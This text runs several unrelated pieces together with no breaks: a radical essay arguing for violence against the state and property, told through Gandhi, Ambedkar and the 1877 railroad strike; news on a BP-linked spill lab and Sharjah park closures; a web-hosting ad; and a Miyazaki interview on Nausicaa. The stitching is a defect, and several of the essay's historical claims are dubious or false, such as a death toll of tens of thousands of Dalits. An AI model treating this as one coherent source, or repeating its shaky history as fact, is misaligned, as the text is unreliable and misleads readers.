The etymological origin of the word violence is the Latin “ violentus ” , meaning vehement , forceful , and probably related to “ violare ” , meaning to violate .
This is the earliest appearance of the word in Western European language , meaning that all future western definitions of the term should be derivative from this root .
This is of course not the case , and the definition of violence in modern industrial society has taken on an abstract and contradictory character , as has peace , freedom , love , hate , joy , democracy , etc .
Most of this abstraction is derived from sociological interpretations of ideas of “ legitimate ” and “ illegitimate ” violence .
Sociologist Max Weber and political theorist Hannah Arendt have added to the mystification of violence , removing it from any natural and neutral sense , and helping to make it the vehicle for both maintaining power and facilitating oppression .
Weber is responsible for the definition of state ( governmental ) power as “ the monopoly of the legitimate use of force ” .
Arendt defined violence inherently in the negative , as something sometimes justifiable , but never acceptable : “ Violence can be justifiable , but it never will be legitimate …
Its justification loses in plausibility the farther its intended end recedes into the future .
No one questions the use of violence in self - defense , because the danger is not only clear but also present , and the end justifying the means is immediate ” .
And more to the point : “ The end of human action , as distinct from the end products of fabrication , can never be reliably predicted .
The means used to achieve political goals are more often than not of greater relevance to the future world than the intended goals . ”
The implication is : if we defend ourselves when attacked , we are justified , but it is still socially wrong .
Is this because violence is somehow unnatural ?
Or is it more because our definition of “ violence ” has drifted too far from the original , and largely neutral , definition ?
If violence is natural , then its rightness or wrongness is purely a human social construction .
Yet we seem to instinctively know when an act of violence is right , and when an act of violence is wrong .
A mother shooting someone threatening her children is something anyone but a dogmatic pacifist would see as right ; while a mugger beating an elderly man to death for the contents of his wallet would be instinctively and universally seen as wrong .
Official , “ legitimate ” violence is judged on a political basis as much as a moral one , expressed in the interpretation of events : the terrorist attack on the world trade center could be interpreted as a viscous act of mass murder or justified retaliation for cultural destruction and racism ; the killing of tens of thousands of Iraqi civilians could be seen as mass murder or justified retaliation for a terrorist attack .
Dogmatic pacifism has defined any kind of violence , even justifiable self - defense , as unacceptable , in keeping with the essence of Arendt ’s position .
This pacifist tendency is derived from two primary sources , both religion - based .
The first is the Christian pacifism of the protestant dissenter sects , such as the Friends , the Amish , the Mennonites , etc .
These groups take their inspiration from various passages in the New Testament , mostly from the Sermon on the Mount , related to the eventual superiority of the meek and the turning of cheeks .
The other source of dogmatic pacifism is from Hinduism , as practiced by Mohandas Gandhi , who developed the practice of “ Satyagraha ” , or “ non-violent resistance ” , in the struggle for Indian rights in South Africa and during the Indian independence movement against British colonialism .
In this theory , the means and ends are completely inseparable , and violence , force of any kind , is always “ unjust ” .
“ They say , ‘ means are , after all , means ’ .
I would say , ‘ means are , after all , everything ’ .
As the means , so the end . ”
Gandhi ’s position is based on the “ law of suffering ” as it appears in many eastern religions , where suffering is seen as a good thing , in that it accrues beneficial “ Karma ” , which in turn can be exchanged in some way for a pleasant reincarnation .
Of course if “ karma ” does n’t exist , if the universe is n’t operated like a giant buyers bonus club , then suffering is just suffering , and ending suffering should be a primary goal of any human activity .
The 20th century Indian independence movement did not begin or end with Mohandas Gandhi and in fact included significant elements of the armed struggle .
Leaders such as Sri Aurobindo and Subash Chandra Bose advocated immediate overthrow of the British Raj by violent means if necessary .
Bose ( called Netaji ) worked with the Soviet Union and Germany to seek support for his Indian National Army , eventually allying with the Japanese and openly fighting the British in Burma and at the battle of Imphal in northeast India .
Bose saw WWII as the perfect opportunity to overthrow the British and drive them out of India .
So did Mohandas Gandhi , who launched the “ Quit India Movement ” in 1942 , although he vacillated on the point , declaring that he did not wish to “ build a free India in the Ashes of Britain . ”
By 1943 the Quit India movement was no longer moving , with all its leaders imprisoned .
Gandhi ’s overtly racist statements regarding black South Africans are public knowledge , as is his participation in the British suppression of the Bambetta rebellion in 1906 South Africa ( he served as a stretcher bearer in the colonial army ) .
He was also a strong advocate of racial purity : “ We believe as much in the purity of race as we think they do ; only we believe that they would best serve these interests , which are as dear to us as to them , by advocating the purity of all races , and not one alone .
We believe also that the white race of South Africa should be the predominating race . ”
Recent protests over the erection of a statue of Gandhi in Johannesburg have reminded many people that the civil rights he was fighting for in South Africa were limited to British Indians , and specifically excluded black Africans .
It was during this period in South Africa that the construction of the Gandhi myth began , mostly by American missionaries and visiting clergy , such as Unitarian minister John H. Holmes who described Gandhi as “ the greatest man since Jesus Christ . ”
George Orwell , in his 1949 essay “ Reflections on Gandhi ” pointed out the level of support Gandhi had from the colonial authorities in India , who were terrified of a mass uprising of the Indian people : “ Strictly speaking , as a Nationalist , he was an enemy , but since in every crisis he would exert himself to prevent violence – which , from the British point of view , meant preventing any effective action whatsoever – he could be regarded as “ our man . ”
In private this was sometimes cynically admitted .
The attitude of the Indian millionaires was similar .
Gandhi called upon them to repent , and naturally they preferred him to the Socialists and Communists who , given the chance , would actually have taken their money away . ”
Surely the most questionable actions by MK Gandhi involved his treatment of the Dalits of India , those called “ untouchables ” .
Gandhi himself was a “ high caste ” Indian , of the merchant caste of Vaishyas .
The Hindu religion teaches that untouchables are being punished for their sins in a past life .
The entire Indian caste system is based on this idea of divine reward ( for the upper castes ) and divine punishment ( for the lower castes ) .
In 1933 Gandhi went on a hunger strike specifically to protest the inclusion of an article in the Indian draft constitution which granted Dalits the right to elect their own leaders .
Literally tens of thousands of Dalits were murdered in the riots that followed .
In the end , the rights of the Dalits were sacrificed .
The Dalit freedom movement of Bhimaro Ramji Ambedkar was a far more admirable effort than that of Gandhi and his followers .
“ Ambedkar was one of Gandhi ’s harshest critics , a bitter opponent of the manner in which Gandhi drew a gauze of unity over what for him was India ’s warring social landscape .
For Ambedkar , the Gandhian movement was conservative , upper caste , and bourgeois , a movement resisting the full - scale socioeconomic transformation of Indian society . ”
Ambedkar correctly argued that democracy without social transformation was pointless , refusing to align his Dalit movement with the Indian nationalist cause , and railing against “ enlightened high caste social reformers who did not have the courage to agitate against caste . ”
Ambedkar championed the idea of the industrial strike , a form of protest that Gandhi refused to sanction , since he opposed all types of class - based conflict .
Ambedkar rejected Gandhism , the caste system , and eventually all Hinduism , converting to Buddhism in 1956 .
The person of Gandhi and whether or not he was a perfect human being is of little real significance .
It is the deification of Gandhi by the pacifist cult that ’s important .
The presentation of Gandhi as a latter - day Jesus , a man who is More than a man , takes us directly to the Christian pacifists , and it ’s no accident that much of the Gandhi myth has been the work of American evangelists .
Through their work Gandhi has become a saintly figure beyond criticism or even critical analysis .
The presentation of a flawless Gandhi has become as vital as the presentation of a flawless Jesus .
Criticism of Gandhi is as unthinkable as criticism of Jesus .
In turn , the idea of passive , non-violent protest has become sacrosanct , immune to criticism , and accepted without question as the only truly legitimate means of opposing the actions of the State .
It is presented as the Perfect Tactic , in fact the only legitimate tactic , for dealing with social change .
That this accepts the State ’s monopoly of violence in the same way that “ the free market ” is accepted as the only legitimate form of economy , and so is a tacit acceptance of the inequity , injustice , and brutality that are inseparable from the Capitalist State , makes it acceptable to the dominant class for the simple reason that it does not threaten them .
Hannah Arendt has produced a significant analysis of this phenomenon in the above referenced work “ On Violence . ”
Writing in 1969 , the thrust of the work is a critique of the New Left ’s love affair of violence , demonstrated in the emergence of numerous clandestine armed struggle organizations .
Her critique draws a clear line between violence and power , arguing against such old saws as Weber and Mao .
She correctly notes that the only thing that can come out of the barrel of a gun is violence , in the form of a bullet .
Power is something different , and may or may not use violence ( which she defines as force ) to establish itself .
“ In a head - on clash between violence and power , the outcome is hardly in doubt .
If Gandhi ’s enormously powerful and successful strategy of nonviolent resistance had met with a different enemy - Stalin ’s Russia , Hitler ’s Germany , even pre-war Japan , instead of England - the outcome would not have be decolonization , but massacre and submission . ”
She does however cling to a belief in a humanity that is somehow beyond and above nature , which is inexplicable .
True that human culture has taken us far from the Hobbesian “ state of nature ” , a few thousand years of civilization are insufficient to alter 100,000 years of genetic coding .
We are separate from nature to the degree that we believe ourselves to be , and even so it is a baseless belief , as any natural “ disaster ” quickly demonstrates .
The radical environmentalist movement has recently become the focus of both police repression and a vigorous tactical debate over the use of violence .
The arrest of a number of members of the Earth Liberation Front ( ELF ) , their trials and attendant harsh sentences for “ eco-terrorism ” , has underscored one relevant fact : the Capitalist State is scared shitless of violence .
They can dismiss peaceful protests by crowds in the hundreds of thousands , ignore even the most aggressive letter - writing campaigns , but one thing they cannot ignore is the willingness to blow the crap out of property .
The sentence given to Marie Mason ( an IWW member and former editor of the Industrial Worker ) is one of the most outrageous ( 21 years in prison for arson ) , and reflects the determination of the State to use the PermaWar on Terror as a club to beat domestic opposition into submission .
For comparison , the average sentence for manslaughter in the USA is 7 - 15 years .
Sentencing Mason to significantly more years in prison than someone who killed another person is a clear message : attacking the basis of Capitalism ( private property ) is worse than killing someone .
Property is to be protected , people are to be imprisoned .
It is not that property has the same rights as people ; property has MORE rights than people .
“ Violence against property ” , what was once dismissed as vandalism , is now a crime against the economy and the State .
The judge at the trial admitted that Mason ’s main crime was against “ the marketplace of ideas ” , a bizarre and mystical place apparently , where ethics are reserved for real estate and people are served only abuse .
Author Derrick Jensen has some very interesting points on the use of violence and “ property violence ” in his 2 volume opus , “ Endgame . ”
From one of the twenty premises :
“ Premise Five :
The property of those higher on the hierarchy is more valuable than the lives of those below .
It is acceptable for those above to increase the amount of property they control — in everyday language , to make money — by destroying or taking the lives of those below .
This is called production .
If those below damage the property of those above , those above may kill or otherwise destroy the lives of those below .
This is called justice . ”
Another interesting premise :
“ Premise Thirteen :
Those in power rule by force , and the sooner we break ourselves of illusions to the contrary , the sooner we can at least begin to make reasonable decisions about whether , when , and how we are going to resist . ”
Jensen has no qualms about the use of violence and presents decent refutations of the claims made by dogmatic pacifists .
I have problems with several aspects of his program ( he demands that “ civilization ” has to be destroyed , yet is clearly writing about one culture , western industrialism , as the destroyer of the world ; civilization did n’t begin in Europe , so it does n’t make sense that it should end there ) ; but I find more to agree with in his work than to disagree with .
Like many people who are able to recognize and articulate the need for radical social change , he has only the foggiest of ideas of how to bring it about .
By ignoring the class struggle , he makes his own position impossible , a not uncommon mistake made by radical environmentalists .
He is however absolutely correct in stating that we should not allow the forces of the State to maintain their monopoly of legitimate force .
To do so is to surrender the one thing they fear most of all .
Jensen also accurately points out that among the lower classes violence is a daily reality .
To say “ violence never works ” is to state the opposite of what we see every day .
Violence definitely works , that ’s why the State uses it so often and so energetically .
But if we ’re to consider the use of violence intelligently , we need to study its history and application , which for us means how and if it has been effective in historical workers struggles .
To do this I want to look at several confrontations between working class rebels and the armed representatives of the Capitalist Sate , determining the results of these based on a very simple criterion : did the outcome further the cause of workers struggle , or did it negatively affect that struggle ?
The Molly Maguires
The civil war gave the same sort of boost to industrial capitalism that World War 2 gave to consumer capitalism , and as the current PermaWar on “ terror ” is designed to boost the next phase of capitalist transformation .
The principle industrial focus in the years after the civil war was the building of the railroads .
Between 1850 and 1870 the miles of track in the United States expanded from 5000 to nearly 80000 , and the principle fuel of this expansion was coal - fired steam engines .
Coal mining and railroad work were the growth areas of employment , with high hopes on the part of workers for expansion of labor unions and accompanying improvements in pay and conditions .
This already vain hope was blown completely to hell when criminal activity in the banking and finance industries resulted in a financial panic and then an economic collapse ( sound familiar ? ) .
Stock market flimflams and real estate scams are as old as capitalism , and the depression of 1873 was every bit as momentous as the depression of the 1930s .
Certainly thousands died of starvation , mostly children .
In those days the deaths of working people were not given much notice , especially if they were foreign - born and / or Catholic .
Union membership , which had grown steadily up to the war years and during the war , dropped dramatically .
Union membership in the coal fields of eastern Pennsylvania had never been large , and the downturn in the economy destroyed the organizations that had existed .
The group called the Molly Maguires first appeared during the civil war , as the bosses fought the nascent organizing taking place when work was plentiful .
The coal operators encouraged their managers to utilize any and all resources to stop workers from forming unions , including violence .
The Mollys came together as a means for the unorganized workers to fight back , and they also used violence .
It had been said , even by those sympathetic to the capitalists , that the coal company gangs committed 10 murders for every one the Mollys did , but even one worker daring to strike back at their masters was intolerable to the capitalists .
The actions of the Molly Maguires were called terrorist even at the time , and that ’s pretty much what they were !
More than a few coal company mine managers ended up shot in the head with a threatening note pinned to their bloody shirts .
During the long strike of 1875 other miners who were considering going back to work were likewise threatened with murder unless they changed their minds .
The coal bosses hired the Pinkerton detective agency to destroy the Molly Maguires , and that is what they did , either by killing suspected members outright or by framing known Mollys for various murders which they may or may not have been a party to .
The 1876 hanging of 20 Molly Maguires in eastern Pennsylvania was good kindling for the Great Strike that came after .
It ’s hard to see how the actions of the Molly Maquires advanced the workers struggle in any real way .
Operating as a “ secret society ” , they exposed themselves to the same danger of infiltration and destruction all clandestine organizations face .
Their actions were retaliatory , exacting revenge for things the bosses did , and got lost in the cycle of revenge that such actions are necessarily limited to .
The mine operators were of course infuriated , not so much at the murder of their managers , but at the sabotage and destruction of their property .
The Molly Maguires did the most good when they were destroying the bosses ’ property , and not the bosses ’ minions .
Still , the Molly Maguires offered a glimmer of hope for the miners of Pennsylvania when any chance of fighting back seemed impossible .
The resources and energy expended by the capitalists in arranging their demise indicates the level of fear they caused them .
Their sacrifice exposed the ruthlessness and criminality of the coal operators more than discrediting the workers struggle in any way .
The Great Uprising of 1877
Called variously the Great Upheaval , the Great Strike , the Great Railroad Strike , and the Great Labor Uprising of 1877 , this event was possibly the most significant action in the class war to take place in the USA before or since .
It was a great victory of working people over the power of the bosses , even though it failed to establish libertarian socialism and workers control , and in fact saw self - organized workers defeated in detail across the country .
Hundreds were killed outright , many more were sent to prison .
The railroad barons were able to call on the power of the federal government , in the form of the Army , to crush the workers revolution as it was being born .
Yet it was still a victory beyond the wildest hopes of those who fought in the streets and rail yards .
The depth of the fear it instilled in the capitalist class can be measured in the thickness of the walls of the fortified armories built in the middle of many cities afterwards .
After the defeat of the Long Strike of the coal miners and the destruction of the Molly Maguires it seemed that a kind of deadly quiet settled over the class struggle in the United States .
The power of the Robber Barons , who tried to own everything and to control what they could not own , seemed unbeatable .
“ By the summer of 1877 it had become clear that no single group of workers - whether through peaceful demonstration , tightly - knit trade unions , armed terrorism , or surprise strikes - could stand against the power of the companies , their armed guards , the Pinkertons , and the armed forces of the government . ”
All of that began to change on July 16th , 1877 , when the Baltimore and Ohio ( B&O ) railroad enforced yet another wage cut for workers .
That this 10 percent wage cut came only one day after the company president had proudly announced a 10 percent dividend for stock holders made the situation glaringly obvious .
This was the third wage reduction since the beginning of the 1873 depression , and workers were literally at the starvation level .
With company charge - backs ( for housing , tools , even train fare ! ) , workers and their families were forever hungry , ill - clothed and in growing debt to the company stores .
The July 16th cut was the final blow .
The uprising began in West Virginia , when workers decided to stop all freight trains until the 10 percent wage cut was reversed .
Passenger and mail trains were not affected .
In Martinsburg , efforts by the sheriff and mayor to end the strike were dismissed and rejected .
By the time regional managers of the B&O were running to the governor ’s office , the strike had already begun to spread along the rail lines .
The governor was only too happy to order a militia company to go to Martinsburg and crush the strike .
What he was n’t aware of was that the militiamen of the area were also railroad workers , and they , and most of the town , were fully in support of the strike .
When the militia arrived in Martinsburg they were greeted by cheers and handshakes from friends and relatives , strikers all , who met them at the station .
After a long search the managers finally found an engineer willing to take a train out .
With armed militiamen in the engine house and on top of the cow catcher , the freight train rolled out of the round house .
A striker , armed with a pistol , rushed in and tried to switch the train onto a siding .
He exchanged shots with militia and was hit three times .
The striker , William Vandergriff , died 9 days later , leaving behind a pregnant wife with no means of support .
After this incident the local militia refused to follow orders , many of them throwing off their uniforms and changing back into civilian clothes .
The colonel in charge wired the governor that he could do nothing more , that the militia was unreliable , and then he dismissed his company .
Another militia company , this time from farther away , was called in .
But they too appeared sympathetic to the strikers , and the officer in charge was reluctant to press the issue , deciding instead to wait for federal troops , which by this time the governor had requested .
President Rutherford B. Hayes had come to power with the backing and connivance of the railroad barons .
He had no problem using troops to break strikes ( and had previously done so as governor of Ohio ) .
On July 18 he issued a proclamation ordering that the “ lawless elements in West Virginia are to disburse by noon on July 19th ” .
The 2nd US Artillery under General William French was dispatched to Martinsburg to insure that his orders were carried out , 300 of whom arrived by the 19th .
Strikebreakers from Baltimore arrived on the 20th , and the freight trains began to move .
Strikers who tried to block the tracks were arrested for inciting a riot .
It appeared that the strike was broken .
This was anything but the case .
The same day , July 20th , handbills began to show up on walls in all of the B&O railroad towns .
They carried bold titles such as : “ WE SHALL CONQUOR OR WE SHALL DIE ” .
The strike was just getting under way .
On July 16th strikers in Baltimore had also walked out , but were almost immediately broken apart by police , militia and company mercenaries .
The difference between Baltimore and Martinsburg had been in the almost 100 percent community support for the strike in Martinsburg and the surrounding area .
With this support the strikers had been able to seize the trains , the rail yards and the roundhouses , and also defend themselves against the militia , whose sympathies were in any case with the strikers .
The strike spread to Newark , Ohio and Hornellsville , New York .
In Hornellsville the New York governor had the unpleasant experience of mobilizing 600 members of the state militia to “ quell the riot , ” only to have them found picnicking and socializing with the strikers .
The strike erupted again in Baltimore when the governor ordered the mobilization of the 5th and 6th Maryland militia to put down disturbances in Cumberland .
Thousands of workers gathered outside the armories and the Camden train station .
At the armories they at first cheered the militia as they left the building , but the cheers turned to shouts of derision as the troops formed up to march .
The shouts were followed by a rain of stones , driving the militiamen back into the armory .
The crowd was definite : the troops were not going to be allowed to get on the trains .
After keeping them under siege for several hours , the soldiers began to fire into the crowd and they began to exit the armory by company .
The best estimate of the number of workers killed in the shooting is over a dozen , probably a lot more , with many dozens wounded .
The strikers dragged their dead and wounded away from the battle , so the actual numbers are unknown .
At the Camden railway station , strikers hearing of the slaughter outside the armories set fire the station , a lumberyard , a train of oil cars , and a foundry .
On the 19th workers at the Pennsylvania railroad in Pittsburgh joined the strike .
Soon foundry workers and mill workers were with them .
At a mass meeting at Phoenix Hall they loudly declared their solidarity .
Attempts by Pittsburgh authorities to mobilize the local militia failed miserably .
Most of the militiamen were either strike supporters or on strike themselves .
One officer reported to his commander : “ You can place little dependence on the troops in your division ; some have thrown down their arms , others have left , and I fear the situation very much ” .
The call was sent for 600 troops from Philadelphia , Pittsburgh ’s commercial rival .
As the Philadelphia troops arrived and began to form up outside the railroad depot , a company official is quoted as saying : “ The Philadelphia regiment wo n’t fire over the heads of the mob . ”
A crowd of 5-6000 was at the station to bar the tracks and keep the trains from moving .
The Philadelphia troops fixed bayonets and tore into the crowd , slashing and stabbing many .
The crowd responded with stones , bricks and pistol fire .
Suddenly the Philadelphia troops began firing into the crowd , shooting as fast as they could reload .
At least 20 people were killed on the spot , many more were wounded , some of whom probably died later .
The crowd scattered as local militia members looked on in shock as a Gatling gun was brought forward .
Most of them went home in disgust or else joined the strikers .
With the tracks now cleared , several engines were fired up .
But the train crews who had stayed loyal to the company and not joined the strike now refused to operate them .
The strike had not only held – it had expanded .
The Philadelphia troops retired to the roundhouse and began to dig in .
Enraged at the massacre , the working classes of Pittsburgh turned out in force .
Several thousand armed workers surrounded the roundhouse and began shooting .
More workers came as time passed , armed with guns , knives , sticks and stones , the crowd poured a withering fire into the roundhouse .
Workers formed themselves into fighting formations and marched under arms through the streets to join the attack .
Local militiamen who had joined the strikers even turned one of their field guns on the roundhouse and began a bombardment .
Finally the roundhouse caught fire , this after several rail cars full of coal and oil had been rammed into the building .
As the flames began to engulf the Pennsylvania depot , the Philadelphia National Guardsmen decided they had had enough .
They had to retreat , but they had to run a gauntlet of gunfire and projectiles as they fled .
The workers of Pittsburgh had completely beaten the army .
Across the river from Pittsburgh , the town of Allegheny was completely under workers control .
After taking guns from the armory , units of strikers dug entrenchments and rifle pits at key points to defend against government troops .
Strikers took over the telegraph office and used it to send messages up and down the railway .
They continued to operate the passenger trains , under workers control , and formed patrols to keep peace in the streets at night .
“ The strike spread almost as fast as word of it , and with it came conflict with the military .
In the Pennsylvania towns of Columbia , Meadville , and Chenago , strikers seized the railroads , occupied the roundhouses , and stopped troop trains .
In Buffalo , New York , the militia was stoned on Sunday but scattered the crowd by threatening to shoot .
The next morning a crowd armed with knives and cudgels stormed into the railroad shops , brushed aside militia guards , and forced shopmen to stop work .
They seized the Erie roundhouse and barricaded it .
When a militia company marched out to recapture the property , a thousand people blocked and drove them back . ”
In Reading , Pennsylvania the militia again opened fire on strikers , killing 11 .
The people were enraged , and began plundering freight cars and tearing up tracks .
They broke into the armory and took enough rifles to arm their own company of fighters .
When the company of militia that had killed the 11 strikers marched down the track toward the strikers they were met with stones and bricks , but a newly arrived company of militia was greeted warmly by friends among the strikers .
When the troops that had massacred the 11 formed up to menace the strikers , the new militia troops went over to the strikers side , telling them ”
If you fire at the mob , we ’ll fire at you . ”
Mutinies among militia units happened in many places .
In Lebanon , Pennsylvania they mutinied but remained under arms , marching through the streets to the cheers of the crowd .
Most just changed back into their civilian clothes and went home or joined the strike .
The entire city of St. Louis , Missouri was under workers control for several days .
At a rally of 10,000 strikers , a barrel - maker proclaimed : “ There was a time in the history of France when the poor found themselves oppressed to such an extent that forbearance ceased to be virtue , and hundreds of heads tumbled into the basket .
That time may have arrived with us . ”
The British consul in St. Louis noted how the workers of the railroad had “ taken the road into their own hands , running the trains and collecting fares … ”
Mills , a sugar refinery , and dozens of other enterprises remained in operation , under worker self - management .
This experiment in workers control was eventually broken by federal troops , vigilantes , railroad mercenaries and the city police .
Twenty to thirty people died and hundreds were wounded in the street fighting that took place before the tyrannical order of capitalism was finally restored .
Participation in the General Strike took place in cities as far away as San Francisco , making it a truly national workers rebellion , and a moment all working class Americans should be proud of , although in the end the power of the capitalist class , with the federal army at their disposal , was too strong to be defeated .
In truth the demands of the strikers had never been revolutionary or unreasonable : they just wanted enough pay to not starve .
Yet for the limitless greed of the capitalists , even this was considered ridiculous and impossible .
Any collective action by working people was seen as criminal conspiracy , and the ruling class would hang the ringleaders like they had the Molly Maguires .
What resulted from capitalist stupidity was an outburst of working class anger and creativity that has n’t been equaled since in the USA , but hopefully will again , sooner rather than later .
On a tactical level , the violent resistance of the strikers was successful in many places in the short term .
In some places the police and government militia switched sides and joined in the cause of the workers .
Turning again to Hannah Arendt : “ In a contest of violence against violence , the superiority of the government has always been absolute ; but this superiority lasts only as long as the power structure of the government remains intact - that is , as long as commands are obeyed and the army or police forces are prepared to use their weapons .
When this is no longer the case the situation changes abruptly .
Not only is the rebellion not put down , but the arms themselves change hands , sometimes , as in the case of the Hungarian revolution , within a few hours . ”
Unfortunately the state seemed to have an unlimited supply of killers whose only loyalty was to the money they were paid .
The participation of the labor unions was virtually non-existent .
In places like Pittsburgh men who had been leaders in the unions became leaders in the general strike , but just as often it seemed that leaders appeared out of the crowds of working people spontaneously , put forward for their good sense and cool heads rather than any union affiliation .
The only political party that claimed to champion the cause of the working class , the Workingmen ’s Party , had nothing to do with creation of the strike , and in fact appeared as frightened as the capitalists in some ways , actually issuing initial calls for caution and non-violence .
They were active in spreading the strike after it had already begun , and played important roles in those places they were strongest ( Chicago and St. Louis ) , but , all in all , they were pretty much irrelevant .
It was the experience of the Great Strike that helped moved one of the Workingmen ’s Party leaders , Albert Parsons , towards Anarchism and away from the electoral strategy of the Marxists .
As amazing as the spontaneity of the Great Uprising , was the class solidarity demonstrated by the working people of places like Pittsburgh and Baltimore .
It was this solidarity that would survive the cannon fire of the army and the hangman ’s noose , and urge the working class into the fight for the 8 hour day in the continuing war with the robber barons of the capitalist class .
NEXT :
Haymarket and the first Red Scare
Local environmental officials throughout the Gulf Coast are feverishly collecting water , sediment and marine animal tissue samples that will be used in the coming months to help track pollution levels resulting from the Deepwater Horizon oil spill .
Hundreds of millions of dollars are at stake , since those readings will be used by the federal government and courts to establish liability claims against BP .
But the laboratory that officials have chosen to process virtually all of the samples is part of an oil and gas services company in Texas that counts oil firms , including BP , among its biggest clients .
Some people are questioning the independence of the Texas lab .
Taylor Kirschenfeld , an environmental official for Escambia County , Fla. , rebuffed instructions from the National Oceanic and Atmospheric Administration to send water samples to the lab , which is based at TDI - Brooks International in College Station , Tex .
He opted instead to get a waiver so he could send his county ’s samples to a local laboratory that is licensed to do the same tests .
Mr. Kirschenfeld said he was also troubled by another rule .
Local animal rescue workers have volunteered to help treat birds affected by the slick and to collect data that would also be used to help calculate penalties for the spill .
But federal officials have told the volunteers that the work must be done by a company hired by BP .
Sharjah : Joggers and walkers who like to exercise in the park each morning must now switch to evenings or walk on the streets in the scorching heat .
Sharjah Municipality has just passed a law that keeps all parks closed to the public until 4 pm .
They will stay open until 10 pm .
The law includes free - entrance neighbourhood parks and those which have an entrance fee .
A Sharjah Municipality official told Gulf
News the new rule aimed to prevent gardeners from staring at female visitors .
" The municipality cannot accept the responsibility of having its employees staring at women and making them feel uncomfortable , " said Sharjah Municipality Agricultural Department head Yaseen Mohammad .
Mohammad said the gardeners tended to the greenery only in the morning .
Thus visitors would be permitted to enter when the gardeners were not at work .
" To combat this threat , the director - general of the municipality has instructed all parks to be closed during the morning , and all parks have to follow the new system , " Mohammad said .
However , residents who use the parks in the morning said they were very upset about the new law and its timings .
As the summer heat approaches , residents who like to exercise in the morning would be forced to walk next to cars on the roads .
" I am a resident staying near Mahatta Park and [ with the park being ] closed during morning hours , this makes it difficult for about 40 people who go for a morning walk , " F. Moosa said .
Congested
" All the people are forced to take rounds outside the park on the pavement , making it very congested .
" Despite sending a letter to the authorities concerned by all of us , no action has been taken .
It is getting increasingly hot and more difficult for all of us . "
Another resident who stays near Al Nahda Park said the park used to be vey popular at 6 am .
People would not only jog there , but they also liked to feed the rabbits that inhabit the park .
Another resident , Vanita , said : " We called up the municipality , and they were also surprised that it was closed .
" A call made by them to the park office yielded no response , so they told us to contact the office in the park , " she said .
" When the lady at the office was contacted , she said she is only following instructions from the municipality .
" She pointed out that in the meantime , joggers and walkers must cram onto the footpath outside the park for their daily exercises .
" It is really funny to know that a watchman sleeps in the park every night but can not [ open the gates in the morning ] . "
Is this a problem in your community park ?
What other facilities could compensate for it ?
Add -ons & features that you want
Free Transfer
Are you currently hosting your website with another company ?
Receiving a subpar service ?
Move to eleven2 and start being treated like a real person !
We help you transfer everything over to us , free of charge with little to no downtime !
cPanel & WHM Included cPanel & WHM offers you the tools that they need to succeed .
cPanel includes a large range of features that allow you to control virtually every aspect of your websites .
WHM helps manage the server and every hosting account on the server .
Script and App Installer Install over 300 scripts and apps instantly with our auto installer .
Wordpress , AbanteCart , PrestaShop , Drupal , Joomla , Magento , Bootstrap and phpBB are some of the popular scripts that can be instantly installed on our world class web hosting platform .
Multiple Backups Eleven2 prides itself on is the amount of attention we give our servers .
Along with Enterprise level hardware and RAID protection , we also plan for worst - case scenarios .
We have multiple backup servers that hold multiple backup points of all of your data .
Money Back Guarantees 60 Day Money Back Guarantee -
At anytime during the first 60 days you can receive a full refund if you 're unhappy with our service .
99.9 % Uptime Guarantee -
We guarantee your website 's uptime !
The work I was n't sure I could finish Y : Nausicaa has ended after 13 years .
M : There are 59 episodes , so if we simply sum up , it has been 5 years .
But with time after and before that ( the time for preparation ? ) , actually , I probably spent about half of these 12 - 13 years on Nausicaa .
To tell you the truth , this was the work I kept wondering if I could finish since the time I started .
I could say that I was able to write without thinking ahead because I decided that I could stop anytime .
I was working like " it turned out this way , " not " I want things to go this way . "
Y : Is that so ?
Since it 's a story world with such a big plot , which can be called an epic drama , we thought you had a detailed story plan from the beginning to the end , and you 've been writing it up patiently , taking your time .
M : No , no , I do n't have such a planning capability .
I wrote something because I was facing a deadline , and I realized the meaning of it much later .
I had such experiences many times .
Y : The movie was released in 1984 , after three years you started the manga , and this year , ten years later , it has concluded .
During this time there have been many words , including some criticism , about it .
M : There seem to be people who read the manga with the impression they got from the movie .
They accepted Nausicaa as a warrior for environmentalism , and they never went beyond that preconceived notion .
It could be said that the manga failed to have such a power ( to change these people 's preconceptions ) .
Y : The story itself is very different between the manga and the movie .
Also , in the manga , we can see a more complicated side of Nausicaa 's personality .
M : Of course , it is .
If the manga and the movie were the same , it makes no sense that I continued to write the manga .
I was n't sure if or how I could start writing it again , but there were some parts in the movie which I was n't completely satisfied with , so I forced myself to continue .
To tell the truth , it was like , I 'd run away from the desk when I had to stop writing to make the next movie .
That 's not a thing I can proudly say .
Even after I finished the next movie , and had had some time off , it was hard for me to return to Nausicaa .
In the end , I stoped writing it four times .
Y : The movie became the flag bearer for the ecology movement , which was just beginning to boom in the 1980s ... M : I myself was n't thinking about it at all , but I think it happened to be there .
It was what we had been thinking about for much longer , and it started with such things as the book of Nakao Sasuke - san .
I mean , I did n't start Nausicaa to write a story about the ecology for the sake of environmental protection .
At first , I intended to write a story which took place in a desert , but it was n't interesting when I put it into drawings , so I changed it to the forest .
Then , it became that kind of story .
In that sense too , I did n't have any big plot .
The writing process was such that " it looks that way , so let 's go that way . "
I faced a writer 's block , so I wanted to have something huge , so , the sleeping God Warrior ...
This one too , I just wrote it into the story saying such thing as " what 's gonna happen ?
I 'm in trouble . "
I continued working , telling myself such lies as " it'll work out eventually .
The magazine will go out of business before that ... " - laughs - Y : What did you try to write when you were thinking about a desert ?
M : I really do n't remember .
I know I must have been thinking many things ...
The only thing I remember is that I was so irritated .
It 's the fact that I was disgusted with the way the society works or such things .
Y : Was it around 1981 - 82 ?
M : It was right before or after 1980 .
( I was disgusted with ) not only environmental problems , but also where humans were going .
Mostly , the way Japan was .
And I was most disgusted with the way I was at that time .
Y : So during the height of the bubble economy you were ... M : I was so embarrassed .
I was so angry .
Am I calmed down now ?
I think the target for my frustration has moved somewhere ...
When I finished the movie , I was cornered Y : So , if you did n't have a plot to the end at the beginning , was n't it hard when it was decided to make the movie Nausicaa ?
M : I was really in trouble .
If it had been another person 's story , I could 've attacked it , but it had just come out from inside of me , so I could n't objectify it .
Even if they were n't written in the manga , behind each panel , I have my own delusions , thoughts , and feelings .
Using the same motives as in the manga , yet , rearranging them , changing their meanings , I had to put them inside such a boundary so I could conclude the story .
A movie has to both open the story up and close it .
Some may say " no , opening up is enough , " but I 'm a person who makes entertainment movies , so I think about the boundary I can close the story in .
I can't do more than that with the movie .
The important thing is that Nausicaa made the Copernican turn when she found the meaning , the role , and the system of the sea of corruption .
I had decided that that was how far the movie would go , but I had so many things I could n't put inside that boundary , and I could n't sort them out .
It was of course impossible since I decided to write what I could n't do in movies into the manga to begin with .
Y : So , that 's why Nausicaa the manga and the movie were totally different works .
